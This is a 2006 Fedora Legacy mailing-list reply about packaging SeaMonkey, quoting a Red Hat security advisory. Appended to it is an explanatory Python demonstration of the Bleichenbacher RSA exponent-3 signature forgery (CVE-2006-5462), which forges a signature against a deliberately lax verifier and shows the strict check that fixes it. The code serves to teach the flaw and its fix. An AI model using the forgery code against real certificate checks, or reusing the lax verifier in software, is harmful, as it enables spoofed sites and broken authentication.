Re: Need SeaMonkey opinions - [Fwd: [RHSA-2006:0734-01] Critical: seamonkey security update]

On Wednesday 08 November 2006 05:43, David Eisenstein wrote:
>Hello Fedora Legacy and Extras folks,
>
>This below RHEL advisory just came out, along with advisories like this
> for Thunderbird and for Firefox.  We in Legacy need to get busy on
> these, because they are critical bugs, and we haven't updated any
> Firefox, Thunderbird, or SeaMonkey (er, Mozilla) packages in a LONG
> time.
>
>There are some old Bugzillas that had been open for RHL 7.3, RHL 9, FC
> 1, FC 2, and FC 3 for Mozilla.  There has been a running discussion (and
> no action -- largely my fault -- sorry!) about how and whether we
> upgrade Mozilla to SeaMonkey so that SeaMonkey becomes a Mozilla
> replacement (Core) package rather than an Extras package on a Bugzilla
> ticket for SeaMonkey. The Bugzilla number is 209167:
><https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=209167>.
>
>My understanding is that Michal Jaegermann (Fedora Legacy contributor)
> has done work on at least one or more previous versions of SeaMonkey,
> having created (FC4?) packages that should, once installed, act as a
> Mozilla replacement, not unlike what the RHEL packages mentioned in
> RHSA-2006-0734 do.
>
>The advantage of having SeaMonkey do this is that all other packages
> (such as yelp, epiphany, possibly others) will inherit the more secure
> code from SeaMonkey, since they tap into the shared-library (.so) files
> that SeaMonkey would be providing.  My understanding then also would be
> that SeaMonkey is meant to be API compatible with Mozilla, so that other
> programs that depend on functions (or objects) in Mozilla's
> shared-library should continue to work okay, possibly without
> recompilation, but probably requiring recompilation and pushing to
> updates.
>
>Does anyone have any comments on how you wish the Legacy Project to
> approach this?  I favor SeaMonkey as a Mozilla replacement, as it covers
> all vulnerabilities in packages that dynamically link to the shared
> libraries. But perhaps there are other ideas.
>
>Since Legacy Mozilla/Firefox/Thunderbird security bugs have been open
> since June (and not worked on), I also advocate that we in Legacy build
> SeaMonkey packages for *all* releases of Fedora Core that we have ever
> supported (since older releases were supported at that time) and RHL 7.3
> and RHL 9. Does anyone object to that?
>
>What say ye??
>
As an interested sidewalk superintendent, I'd say go with seamonkey since a 
lot of that stuff comes for free with it.

> Regards,
> David Eisenstein
>
>
>
>-------- Original Message --------
>Subject: [RHSA-2006:0734-01] Critical: seamonkey security update
>Date: Wed, 8 Nov 2006 04:48:59 -0500
>From: bugzilla@xxxxxxxxxx
>To: enterprise-watch-list@xxxxxxxxxx
>
>---------------------------------------------------------------------
>                   Red Hat Security Advisory
>
>Synopsis:          Critical: seamonkey security update
>Advisory ID:       RHSA-2006:0734-01
>Advisory URL:      https://rhn.redhat.com/errata/RHSA-2006-0734.html
>Issue date:        2006-11-08
>Updated on:        2006-11-08
>Product:           Red Hat Enterprise Linux
>CVE Names:         CVE-2006-5462 CVE-2006-5463 CVE-2006-5464
>                   CVE-2006-5747 CVE-2006-5748
>---------------------------------------------------------------------
>
>1. Summary:
>
>Updated seamonkey packages that fix several security bugs are now
> available for Red Hat Enterprise Linux 2.1, 3, and 4.
>
>This update has been rated as having critical security impact by the Red
>Hat Security Response Team.
>
>2. Relevant releases/architectures:
>
>... (RHEL 2.1, RHEL 3, RHEL 4) ...
>
>3. Problem description:
>
>SeaMonkey is an open source Web browser, advanced email and newsgroup
>client, IRC chat client, and HTML editor.
>
>Several flaws were found in the way SeaMonkey processes certain malformed
>Javascript code. A malicious web page could cause the execution of
>Javascript code in such a way that could cause SeaMonkey to crash or
>execute arbitrary code as the user running SeaMonkey. (CVE-2006-5463,
>CVE-2006-5747, CVE-2006-5748)
>
>Several flaws were found in the way SeaMonkey renders web pages. A
>malicious web page could cause the browser to crash or possibly execute
>arbitrary code as the user running SeaMonkey. (CVE-2006-5464)
>
>A flaw was found in the way SeaMonkey verifies RSA signatures. For RSA
> keys with exponent 3 it is possible for an attacker to forge a signature
> that would be incorrectly verified by the NSS library. SeaMonkey as
> shipped trusts several root Certificate Authorities that use exponent 3.
> An attacker could have created a carefully crafted SSL certificate which
> would be incorrectly trusted when their site was visited by a victim. This
> flaw was previously thought to be fixed in SeaMonkey 1.0.5, however
> Ulrich Kuehn discovered the fix was incomplete (CVE-2006-5462)
>
>Users of SeaMonkey are advised to upgrade to these erratum packages,
> which contain SeaMonkey version 1.0.6 that corrects these issues.
>
><<snip>>

-- 
Cheers, Gene
"There are four boxes to be used in defense of liberty:
 soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
Yahoo.com and AOL/TW attorneys please note, additions to the above
message by Gene Heskett are:
Copyright 2006 by Maurice Eugene Heskett, all rights reserved.

--
fedora-legacy-list mailing list
fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
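The RSA exponent-3 flaw in the forwarded advisory (CVE-2006-5462) is the signature-forgery bug class Daniel Bleichenbacher described in 2006: a PKCS#1 v1.5 verifier that walks past the 0xFF padding, reads the DigestInfo and hash from wherever the padding ended, and ignores whatever follows. With e=3 an attacker who knows only the CA's public modulus can build such a block, pad it with zeros, and take an integer cube root; the cube of that root differs from the block only in the low-order "garbage" bytes, so it verifies. The example below is added here to illustrate that mechanism and the fix; it is not NSS, SeaMonkey or Red Hat code. It uses SHA-1 DigestInfo encoding from RFC 3447, a placeholder 2048-bit modulus instead of a real CA key (only pow(s, 3, N) is ever computed and s**3 stays below N, so any odd number with the top bit set behaves the same for this purpose), and a constructed sample message; the names lax_verify_em, strict_verify_em and forge_signature are this example's own.

```python
"""Bleichenbacher-style RSA e=3 PKCS#1 v1.5 signature forgery against a lax
verifier (the bug class behind CVE-2006-5462), next to the strict check that
stops it.  Added example, not NSS or SeaMonkey code."""
import hashlib
import hmac

# DigestInfo prefix for SHA-1 (RFC 3447, section 9.2, note 1)
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")

# Placeholder 2048-bit "public modulus" (assumption: a real attack would use
# the CA's actual modulus).  Only pow(s, 3, N) is computed below and the
# forged s**3 is smaller than N, so the reduction is a no-op either way.
N = (1 << 2047) | (1 << 1000) | 1
E = 3
K = (N.bit_length() + 7) // 8  # modulus length in bytes (256)


def encode_pkcs1_v15(message: bytes, k: int = K) -> bytes:
    """EM = 00 01 FF..FF 00 || DigestInfo || SHA-1(message)  (RFC 3447 EMSA-PKCS1-v1_5)."""
    t = SHA1_DIGESTINFO + hashlib.sha1(message).digest()
    ps_len = k - 3 - len(t)
    assert ps_len >= 8, "modulus too short for this encoding"
    return b"\x00\x01" + b"\xff" * ps_len + b"\x00" + t


def lax_verify_em(em: bytes, message: bytes) -> bool:
    """The flawed pattern: skip the padding, then read DigestInfo || hash from
    wherever the padding ended.  Trailing bytes are never examined."""
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        return False
    i += 1
    t = SHA1_DIGESTINFO + hashlib.sha1(message).digest()
    return em[i:i + len(t)] == t


def strict_verify_em(em: bytes, message: bytes) -> bool:
    """The correct check: rebuild the entire expected EM and compare all k bytes,
    so padding length, terminator position and trailing bytes are all enforced."""
    return hmac.compare_digest(em, encode_pkcs1_v15(message, len(em)))


def icbrt_ceil(x: int) -> int:
    """Smallest integer s with s**3 >= x (exact integer binary search)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge_signature(message: bytes, n: int = N) -> int:
    """Forge an e=3 signature with no private key.  The prefix that the lax
    parser inspects is followed by zeros; s = ceil(cbrt(value)) satisfies
    s**3 - value < 3*s**2 + 3*s + 1, i.e. the cube only disturbs the low
    ~2/3 of the bits, which all lie in the ignored trailing region."""
    k = (n.bit_length() + 7) // 8
    t = SHA1_DIGESTINFO + hashlib.sha1(message).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = icbrt_ceil(target)
    assert s ** 3 < n  # modular reduction changes nothing
    return s


def recover_em(sig: int, n: int = N, e: int = E) -> bytes:
    """RSA verification primitive: EM = sig**e mod n, as k bytes."""
    k = (n.bit_length() + 7) // 8
    return pow(sig, e, n).to_bytes(k, "big")


def demo() -> tuple:
    """Returns (lax verifier accepts forgery, strict verifier accepts forgery)."""
    msg = b"CN=evil.example, issued by a trusted e=3 CA"  # constructed sample input
    sig = forge_signature(msg)
    em = recover_em(sig)
    return lax_verify_em(em, msg), strict_verify_em(em, msg)


if __name__ == "__main__":
    lax, strict = demo()
    print("lax verifier accepts forgery:   ", lax)
    print("strict verifier accepts forgery:", strict)
```

The forgery works for any verifier that stops checking after the hash, which is why the advisory singles out exponent 3 and the roots that use it: with a larger exponent the cube-root trick does not apply. Rebuilding the full encoded message and comparing it whole is the standard fix, and it also removes the incentive to hand-parse the ASN.1 DigestInfo at all.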
